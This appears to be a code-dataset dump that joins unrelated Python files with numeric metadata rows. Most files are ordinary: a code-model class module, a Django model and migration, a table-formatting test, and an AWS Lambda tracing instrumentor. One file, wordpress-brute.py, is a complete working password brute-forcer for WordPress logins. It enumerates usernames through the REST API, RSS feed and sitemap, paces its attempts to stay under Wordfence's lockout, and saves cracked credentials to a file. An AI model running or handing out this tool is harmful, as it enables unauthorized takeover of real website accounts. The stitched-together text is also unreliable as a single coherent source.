body.""" return [(self.condition, self.body)] def _set_condition(self, condition): """Set the condition for this control flow structure.""" assert isinstance(condition, CodeExpression.TYPES) self.condition = condition def _set_body(self, body): """Set the main body for this control flow structure.""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.body = body else: self.body._add(body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return '{} {}'.format(self.name, self.get_branches()) class CodeConditional(CodeControlFlow): """This class represents a conditional (`if`). A conditional is allowed to have a default branch (the `else` branch), besides its mandatory one. """ def __init__(self, scope, parent): """Constructor for conditionals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, 'if') self.else_body = CodeBlock(scope, self, explicit=False) @property def then_branch(self): """The branch associated with a condition.""" return self.condition, self.body @property def else_branch(self): """The default branch of the conditional.""" return True, self.else_body def statement(self, i): """Return the *i*-th statement of this block. Behaves as if the *then* and *else* branches were concatenated, for indexing purposes. """ # ----- This code is just to avoid creating a new list and # returning a custom exception message. o = len(self.body) n = o + len(self.else_body) if i >= 0 and i < n: if i < o: return self.body.statement(i) return self.else_body.statement(i - o) elif i < 0 and i >= -n: if i >= o - n: return self.else_body.statement(i) return self.body.statement(i - o + n) raise IndexError('statement index out of range') def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" k = i + 1 o = len(self.body) n = o + len(self.else_body) if k > 0: if k < o: return self.body.statement(k) if k > o and k < n: return self.else_body.statement(k) if k < 0: if k < o - n and k > -n: return self.body.statement(k) if k > o - n: return self.else_body.statement(k) return None def get_branches(self): """Return a list with the conditional branch and the default branch.""" if self.else_branch: return [self.then_branch, self.else_branch] return [self.then_branch] def _add_default_branch(self, body): """Add a default body for this conditional (the `else` branch).""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.else_body = body else: self.else_body._add(body) def __len__(self): """Return the length of both branches combined.""" return len(self.body) + len(self.else_body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj for codeobj in self.else_body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}if ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) if self.else_body: pretty += '\n{}else:\n'.format(spaces) pretty += self.else_body.pretty_str(indent=indent + 2) return pretty class CodeLoop(CodeControlFlow): """This class represents a loop (e.g. `while`, `for`). Some languages allow loops to define local declarations, as well as an increment statement. A loop has only a single branch, its condition plus the body that should be repeated while the condition holds. """ def __init__(self, scope, parent, name): """Constructor for loops. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the loop statement in the program. """ CodeControlFlow.__init__(self, scope, parent, name) self.declarations = None self.increment = None def _set_declarations(self, declarations): """Set declarations local to this loop (e.g. `for` variables).""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_increment(self, statement): """Set the increment statement for this loop (e.g. in a `for`).""" assert isinstance(statement, CodeStatement) self.increment = statement statement.scope = self.body def _children(self): """Yield all direct children of this object.""" if self.declarations: yield self.declarations if isinstance(self.condition, CodeExpression): yield self.condition if self.increment: yield self.increment for codeobj in self.body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) v = self.declarations.pretty_str() if self.declarations else '' i = self.increment.pretty_str(indent=1) if self.increment else '' pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeSwitch(CodeControlFlow): """This class represents a switch statement. A switch evaluates a value (its `condition`) and then declares at least one branch (*cases*) that execute when the evaluated value is equal to the branch value. It may also have a default branch. Switches are often one of the most complex constructs of programming languages, so this implementation might be lackluster. """ def __init__(self, scope, parent): """Constructor for switches. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, "switch") self.cases = [] self.default_case = None def _add_branch(self, value, statement): """Add a branch/case (value and statement) to this switch.""" self.cases.append((value, statement)) def _add_default_branch(self, statement): """Add a default branch to this switch.""" self.default_case = statement def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}switch ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeTryBlock(CodeStatement, CodeStatementGroup): """This class represents a try-catch block statement. `try` blocks have a main body of statements, just like regular blocks. Multiple `catch` blocks may be defined to handle specific types of exceptions. Some languages also allow a `finally` block that is executed after the other blocks (either the `try` block, or a `catch` block, when an exception is raised and handled). """ def __init__(self, scope, parent): """Constructor for try block structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.body = CodeBlock(scope, self, explicit=True) self.catches = [] self.finally_body = CodeBlock(scope, self, explicit=True) def _set_body(self, body): """Set the main body for try block structure.""" assert isinstance(body, CodeBlock) self.body = body def _add_catch(self, catch_block): """Add a catch block (exception variable declaration and block) to this try block structure. """ assert isinstance(catch_block, self.CodeCatchBlock) self.catches.append(catch_block) def _set_finally_body(self, body): """Set the finally body for try block structure.""" assert isinstance(body, CodeBlock) self.finally_body = body def _children(self): """Yield all direct children of this object.""" for codeobj in self.body._children(): yield codeobj for catch_block in self.catches: for codeobj in catch_block._children(): yield codeobj for codeobj in self.finally_body._children(): yield codeobj def __len__(self): """Return the length of all blocks combined.""" n = len(self.body) + len(self.catches) + len(self.finally_body) n += sum(map(len, self.catches)) return n def __repr__(self): """Return a string representation of this object.""" return 'try {} {} {}'.format(self.body, self.catches, self.finally_body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'try:\n' pretty += self.body.pretty_str(indent=indent + 2) for block in self.catches: pretty += '\n' + block.pretty_str(indent) if len(self.finally_body) > 0: pretty += '\n{}finally:\n'.format(spaces) pretty += self.finally_body.pretty_str(indent=indent + 2) return pretty class CodeCatchBlock(CodeStatement, CodeStatementGroup): """Helper class for catch statements within a try-catch block.""" def __init__(self, scope, parent): """Constructor for catch block structures.""" CodeStatement.__init__(self, scope, parent) self.declarations = None self.body = CodeBlock(scope, self, explicit=True) def _set_declarations(self, declarations): """Set declarations local to this catch block.""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_body(self, body): """Set the main body of the catch block.""" assert isinstance(body, CodeBlock) self.body = body def _children(self): """Yield all direct children of this object.""" if isinstance(self.declarations, CodeStatement): yield self.declarations for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return 'catch ({}) {}'.format(self.declarations, self.body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent decls = ('...' if self.declarations is None else self.declarations.pretty_str()) body = self.body.pretty_str(indent=indent + 2) pretty = '{}catch ({}):\n{}'.format(spaces, decls, body) return pretty ############################################################################### # Helpers ############################################################################### def pretty_str(something, indent=0): """Return a human-readable string representation of an object. Uses `pretty_str` if the given value is an instance of `CodeEntity` and `repr` otherwise. Args: something: Some value to convert. Kwargs: indent (int): The amount of spaces to use as indentation. """ if isinstance(something, CodeEntity): return something.pretty_str(indent=indent) else: return (' ' * indent) + repr(something)
35.889841
81
0.60325
6,906
58,644
5.038952
0.082682
0.034771
0.02138
0.025662
0.571281
0.507141
0.465732
0.430616
0.409926
0.393575
0
0.001641
0.293602
58,644
1,633
82
35.911819
0.838387
0.427819
0
0.487805
0
0
0.024693
0
0
0
0
0
0.032999
1
0.220947
false
0.012912
0
0.002869
0.407461
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc4647689f1b8d8a1248e0d89dd5fa8d84dedfbf
350
py
Python
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
def is_even(i: int) -> bool: if i == 1: return False elif i == 2: return True elif i == 3: return False elif i == 4: return True elif i == 5: ... # Never do that! Use one of these instead... is_even = lambda i : i % 2 == 0 is_even = lambda i : not i & 1 is_odd = lambda i : not is_even(i)
20.588235
44
0.511429
59
350
2.949153
0.474576
0.137931
0.08046
0.183908
0
0
0
0
0
0
0
0.036364
0.371429
350
17
45
20.588235
0.754545
0.12
0
0.285714
0
0
0
0
0
0
0
0
0
1
0.071429
false
0
0
0
0.357143
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc46a91fda80741480960994acf3dbc98c9e618b
8,886
py
Python
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-07-27T11:30:23.000Z
2020-07-27T11:30:23.000Z
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
null
null
null
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-05-17T12:40:13.000Z
2020-05-17T12:40:13.000Z
#!/usr/bin/env python # # Wordpress Bruteforce Tool # # By @random_robbie # # import requests import json import sys import argparse import re import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL") parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File") args = parser.parse_args() url = args.url passfile = args.file http_proxy = "" proxyDict = { "http" : http_proxy, "https" : http_proxy, "ftp" : http_proxy } # Grab Wordpress Users via Wordpress JSON api def grab_users_api(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict) if 'rest_user_cannot_view' in response.text: print ("[-] REST API Endpoint Requires Permissions [-]") return False if response.status_code == 404: print ("[-] Rest API Endpoint returns 404 Not Found [-]") return False elif response.status_code == 200: jsonstr = json.loads(response.content) return jsonstr # Grab Wordpress Users via Sitemap def grab_users_sitemap(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: return response.text # Grab Wordpress Users via RSS Feed def grab_users_rssfeed(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: if "dc:creator" in response.text: return response.text # Check we can get to wp-admin login. def check_wpadmin(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict) if "Powered by WordPress" in response.text: if "wp-submit" in response.text: if "reCAPTCHA" not in response.text: return True else: return False else: return False else: return False # Check URL is wordpress def check_is_wp(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict) if "wp-content" in response.text: return True else: return False # Check if wordfence is installed as this limits the logins to 20 per ip def check_wordfence(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict) if "Wordfence Security - Firewall & Malware Scan" in response.text: return True else: return False # Test the logins def test_login (url,user,password,cnt,attempts): if str(cnt) == attempts: print("[-] Stopping as Wordfence will block your IP [-]") sys.exit(0) paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"} headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} cookies = {"wordpress_test_cookie":"WP+Cookie+check"} response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False) if response.status_code == 503: print("[-] Website is giving 503 HTTP Status [-]") sys.exit(0) if response.status_code == 502: print("[-] Website is giving 502 HTTP Status [-]") sys.exit(0) if response.status_code == 403: print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]") sys.exit(0) if "Google Authenticator code" in response.text: print("[-] 2FA is enabled Sorry [-]") sys.exit(0) if "wordpress_logged_in" in response.headers['Set-Cookie']: print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]") text_file = open("found.txt", "a") text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n") text_file.close() sys.exit(0) else: print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]") cnt += 1 return cnt def count_pass(passfile): count = 0 with open(passfile, 'r') as f: for line in f: count += 1 f.close() return str(count) # Dont no body like dupes. def remove_dupes(): lines_seen = set() outfile = open("users.txt", "w") for line in open("rssusers.txt", "r"): if line not in lines_seen: outfile.write(line) lines_seen.add(line) outfile.close() def attack_restapi(url,attempts,userdata,passfile): for id in userdata: user = id['slug'] cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() def attack_rssfeed(url,attempts,userdata,passfile): users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata) if os.path.exists("rssusers.txt"): os.remove("rssusers.txt") if os.path.exists("users.txt"): os.remove("users.txt") for user in users: u = user.replace("[CDATA[","") text_file = open("rssusers.txt", "a") text_file.write(""+str(u)+"\n") text_file.close() remove_dupes() with open("users.txt", 'r') as f: for line in f: user = line.strip() cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as b: for line in b: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() b.close() def attack_sitemap(url,attempts,userdata,passfile): auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata) for user in auth: thisuser = user[1] h = thisuser.split('/') user = h[4] cnt = 1 with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() # Time For Some Machine Learning Quality IF statements. def basic_checks(url): if check_is_wp(url): if check_wpadmin(url): return True else: return False else: return False if basic_checks(url): print("[+] Confirmed Wordpress Website [+]") else: print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]") sys.exit(0) if os.path.isfile(passfile) and os.access(passfile, os.R_OK): print("[+] Password List Used: "+passfile+" [+]") else: print("[-] Either the file is missing or not readable [-]") sys.exit(0) # Method Value for which method to enumerate users from method = "None" attempts = "None" # Which method to use for enumeration if grab_users_api(url): print("[+] Users found via Rest API [-]") method = "restapi" if grab_users_rssfeed(url) and method == "None": print("[+] Users found via RSS Feed [+]") method = "rss" if grab_users_sitemap(url) and method == "None": print("[+] Users found via Authors Sitemap [-]") method = "sitemap" if method == "None": print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]") sys.exit(0) if check_wordfence(url): print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]") attempts = "20" # Kick off Parsing and attacking if method == "restapi": userdata = grab_users_api(url) attack_restapi(url,attempts,userdata,passfile) if method == "rss": userdata = grab_users_rssfeed(url) attack_rssfeed(url,attempts,userdata,passfile) if method == "sitemap": userdata = grab_users_sitemap(url) attack_sitemap(url,attempts,userdata,passfile)
31.399293
388
0.679721
1,289
8,886
4.624515
0.223429
0.007046
0.027177
0.019963
0.41436
0.393055
0.33954
0.296427
0.241738
0.228988
0
0.028727
0.153838
8,886
282
389
31.510638
0.764064
0.059419
0
0.344498
0
0.043062
0.325699
0.039333
0
0
0
0
0
1
0.062201
false
0.124402
0.033493
0
0.191388
0.095694
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc49b99b0326493e147f5f9c2af303341e2290ed
2,422
py
Python
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """Test the terminaltables output adapter.""" from __future__ import unicode_literals from textwrap import dedent import pytest from cli_helpers.compat import HAS_PYGMENTS from cli_helpers.tabular_output import terminaltables_adapter if HAS_PYGMENTS: from pygments.style import Style from pygments.token import Token def test_terminal_tables_adapter(): """Test the terminaltables output adapter.""" data = [['abc', 1], ['d', 456]] headers = ['letters', 'number'] output = terminaltables_adapter.adapter( iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ +---------+--------+ | letters | number | +---------+--------+ | abc | 1 | | d | 456 | +---------+--------+''') @pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library') def test_style_output_table(): """Test that *style_output_table()* styles the output table.""" class CliStyle(Style): default_style = "" styles = { Token.Output.TableSeparator: '#ansired', } headers = ['h1', 'h2'] data = [['观音', '2'], ['Ποσειδῶν', 'b']] style_output_table = terminaltables_adapter.style_output_table('ascii') style_output_table(data, headers, style=CliStyle) output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ \x1b[31;01m+\x1b[39;00m''' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' + ''' h2 \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' + ''' 2 \x1b[31;01m|\x1b[39;00m \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' + ''' b \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '\x1b[31;01m+\x1b[39;00m')
34.6
86
0.547069
316
2,422
4.091772
0.218354
0.092807
0.148492
0.204176
0.492653
0.440062
0.402939
0.402939
0.402939
0.402939
0
0.143322
0.239472
2,422
69
87
35.101449
0.558632
0.066061
0
0.306122
0
0
0.305112
0.159212
0
0
0
0
0.040816
1
0.040816
false
0
0.142857
0
0.244898
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc50f97ead454f81e6290dc083d27cd62ab11353
2,878
py
Python
vendor/models.py
brethauer/mirage
396f61206bf76f997c0535277af918058aa1b827
[ "CC0-1.0" ]
8
2015-03-07T02:56:32.000Z
2016-08-30T17:09:30.000Z
vendor/models.py
brethauer/mirage
396f61206bf76f997c0535277af918058aa1b827
[ "CC0-1.0" ]
16
2015-02-25T16:09:39.000Z
2016-12-09T22:58:04.000Z
vendor/models.py
brethauer/mirage
396f61206bf76f997c0535277af918058aa1b827
[ "CC0-1.0" ]
13
2015-03-09T00:20:49.000Z
2021-02-14T11:02:32.000Z
from django.db import models VEHICLE_CHOICES = ( ('OASISSB', 'OASIS Small Business'), ('OASIS', 'OASIS Unrestricted') ) STATUS_CHOICES = ( ('P', 'In Progress'), ('C', 'Completed'), ('F', 'Cancelled') ) class Vendor(models.Model): name = models.CharField(max_length=128) duns = models.CharField(max_length=9, unique=True) duns_4 = models.CharField(max_length=13, unique=True) cage = models.CharField(max_length=15, null=True) sam_address = models.CharField(null=True, max_length=128) sam_citystate = models.CharField(null=True, max_length=128) cm_name = models.CharField(null=True, max_length=128) cm_email = models.CharField(null=True, max_length=128) cm_phone = models.CharField(null=True, max_length=128) pm_name = models.CharField(null=True, max_length=128) pm_email = models.CharField(null=True, max_length=128) pm_phone = models.CharField(null=True, max_length=128) pools = models.ManyToManyField('Pool', through='PoolPIID') setasides = models.ManyToManyField('SetAside', null=True, blank=True) sam_status = models.CharField(null=True, max_length=128) sam_activation_date = models.DateTimeField(null=True) sam_expiration_date = models.DateTimeField(null=True) sam_exclusion = models.NullBooleanField(null=True) sam_url = models.URLField(null=True) annual_revenue = models.BigIntegerField(null=True) number_of_employees = models.IntegerField(null=True) def __str__(self): return self.name class Pool(models.Model): id = models.CharField(primary_key=True, max_length=128) name = models.CharField(max_length=128, default='Pool') number = models.CharField(max_length=128) vehicle = models.CharField(choices=VEHICLE_CHOICES, max_length=7) naics = models.ManyToManyField('Naics') threshold = models.CharField(null=True, max_length=128) def __str__(self): return "Pool {0} - {1}".format(self.number, self.get_vehicle_display()) class PoolPIID(models.Model): vendor = models.ForeignKey('Vendor') pool = models.ForeignKey('Pool') piid = models.CharField(max_length=128) def __str__(self): return "{0} - {1} - {2}".format(self.vendor.name, self.pool.id, self.piid) class SetAside(models.Model): code = models.CharField(unique=True, max_length=128) short_name = models.CharField(max_length=128) abbreviation = models.CharField(max_length=10, null=True) far_order = models.IntegerField(null=True) def __str__(self): return self.short_name class Naics(models.Model): code = models.CharField(max_length=128) description = models.TextField() short_code = models.CharField(unique=True, max_length=25) def __str__(self): return "{0} - {1}".format(self.code, self.description) class SamLoad(models.Model): sam_load = models.DateField()
33.858824
82
0.709173
375
2,878
5.245333
0.261333
0.18302
0.109812
0.097611
0.449415
0.401118
0.3091
0.2303
0.046772
0
0
0.029801
0.160528
2,878
84
83
34.261905
0.784354
0
0
0.078125
0
0
0.055247
0
0
0
0
0
0
1
0.078125
false
0
0.015625
0.078125
0.859375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
fc557f84938097fbd8c0d95d4d05c57f1ad0bde0
4,093
py
Python
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
1
2021-01-24T12:08:18.000Z
2021-01-24T12:08:18.000Z
# Copyright 2020, OpenTelemetry Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # TODO: usage """ The opentelemetry-instrumentation-aws-lambda package allows tracing AWS Lambda function. Usage ----- .. code:: python # Copy this snippet into AWS Lambda function # Ref Doc: https://docs.aws.amazon.com/lambda/latest/dg/lambda-python.html import boto3 from opentelemetry.instrumentation.aws_lambda import ( AwsLambdaInstrumentor ) # Enable instrumentation AwsLambdaInstrumentor().instrument() # Lambda function def lambda_handler(event, context): s3 = boto3.resource('s3') for bucket in s3.buckets.all(): print(bucket.name) return "200 OK" API --- """ import logging import os from importlib import import_module from wrapt import wrap_function_wrapper # TODO: aws propagator from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import ( AwsXRayFormat, ) from opentelemetry.instrumentation.aws_lambda.version import __version__ from opentelemetry.instrumentation.instrumentor import BaseInstrumentor from opentelemetry.instrumentation.utils import unwrap from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider logger = logging.getLogger(__name__) class AwsLambdaInstrumentor(BaseInstrumentor): def _instrument(self, **kwargs): self._tracer = get_tracer(__name__, __version__, kwargs.get("tracer_provider")) self._tracer_provider = get_tracer_provider() lambda_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER")) wrapped_names = lambda_handler.rsplit(".", 1) self._wrapped_module_name = wrapped_names[0] self._wrapped_function_name = wrapped_names[1] wrap_function_wrapper( self._wrapped_module_name, self._wrapped_function_name, self._functionPatch, ) def _uninstrument(self, **kwargs): unwrap( import_module(self._wrapped_module_name), self._wrapped_function_name, ) def _functionPatch(self, original_func, instance, args, kwargs): lambda_context = args[1] ctx_aws_request_id = lambda_context.aws_request_id ctx_invoked_function_arn = lambda_context.invoked_function_arn orig_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER")) # TODO: enable propagate from AWS by env variable xray_trace_id = os.environ.get("_X_AMZN_TRACE_ID", "") lambda_name = os.environ.get("AWS_LAMBDA_FUNCTION_NAME") function_version = os.environ.get("AWS_LAMBDA_FUNCTION_VERSION") propagator = AwsXRayFormat() parent_context = propagator.extract({"X-Amzn-Trace-Id": xray_trace_id}) with self._tracer.start_as_current_span( name=orig_handler, context=parent_context, kind=SpanKind.SERVER ) as span: # Refer: https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/faas.md#example span.set_attribute("faas.execution", ctx_aws_request_id) span.set_attribute("faas.id", ctx_invoked_function_arn) # TODO: fix in Collector because they belong resource attrubutes span.set_attribute("faas.name", lambda_name) span.set_attribute("faas.version", function_version) result = original_func(*args, **kwargs) # force_flush before function quit in case of Lambda freeze. self._tracer_provider.force_flush() return result
34.108333
151
0.716101
497
4,093
5.647887
0.382294
0.022444
0.029925
0.027075
0.133951
0.086926
0.066263
0.066263
0.034913
0.034913
0
0.006096
0.198387
4,093
119
152
34.394958
0.849436
0.374786
0
0.04
0
0
0.07109
0.020142
0
0
0
0.016807
0
1
0.06
false
0
0.2
0
0.3
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc572a69e6a41f7d2d8f4eb6c221dcaa2427e9e3
471
py
Python
instructors/migrations/0021_alter_user_avatar_url.py
bastoune57/gokiting_back_end
f3edcbeede292713349b28f2390b5d57e1420f8e
[ "MIT" ]
null
null
null
instructors/migrations/0021_alter_user_avatar_url.py
bastoune57/gokiting_back_end
f3edcbeede292713349b28f2390b5d57e1420f8e
[ "MIT" ]
null
null
null
instructors/migrations/0021_alter_user_avatar_url.py
bastoune57/gokiting_back_end
f3edcbeede292713349b28f2390b5d57e1420f8e
[ "MIT" ]
null
null
null
# Generated by Django 4.0.2 on 2022-04-01 16:09 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('instructors', '0020_alter_user_description_alter_user_title'), ] operations = [ migrations.AlterField( model_name='user', name='avatar_url', field=models.ImageField(default='profile_pics/einstein_EqBibwO.jpeg', upload_to='profile_pics'), ), ]
24.789474
108
0.651805
53
471
5.566038
0.792453
0.061017
0
0
0
0
0
0
0
0
0
0.052925
0.237792
471
18
109
26.166667
0.768802
0.095541
0
0
1
0
0.271226
0.183962
0
0
0
0
0
1
0
false
0
0.083333
0
0.333333
0
0
0
0
null
0
